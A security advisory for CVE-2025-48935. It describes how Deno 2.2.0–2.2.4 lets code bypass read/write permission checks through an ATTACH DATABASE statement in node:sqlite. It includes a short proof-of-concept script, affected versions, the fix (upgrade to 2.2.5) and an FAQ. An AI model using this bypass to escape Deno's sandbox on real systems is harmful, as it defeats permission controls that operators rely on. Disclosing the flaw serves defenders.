CVE-2025-48935: Deno has --allow-read / --allow-write permission bypass in `node:sqlite`
Summary
It is possible to bypass Deno's read/write permission checks by using ATTACH DATABASE statement.
PoC
js // poc.js import { DatabaseSync } from "node:sqlite"
const db = new DatabaseSync(":memory:"); db.exec("ATTACH DATABASE 'test.db' as test;");
db.exec("CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);");
$ deno poc.js
Other sources
Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 2.2.0 and prior to versions 2.2.5, it is possible to bypass Deno's permission read/write db permission check by using ATTACH DATABASE statement. Version 2.2.5 contains a patch for the issue.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2025-48935?
CVE-2025-48935 is considered a high severity vulnerability due to the potential bypass of permission checks.
How do I fix CVE-2025-48935?
To fix CVE-2025-48935, upgrade Deno to version 2.2.5 or later.
What versions are affected by CVE-2025-48935?
CVE-2025-48935 affects Deno versions from 2.2.0 to 2.2.4.
What impact does CVE-2025-48935 have on Deno?
CVE-2025-48935 allows attackers to bypass read/write database permission checks, posing a security risk.
What is the main cause of CVE-2025-48935?
The main cause of CVE-2025-48935 is the improper handling of the `ATTACH DATABASE` statement in Deno.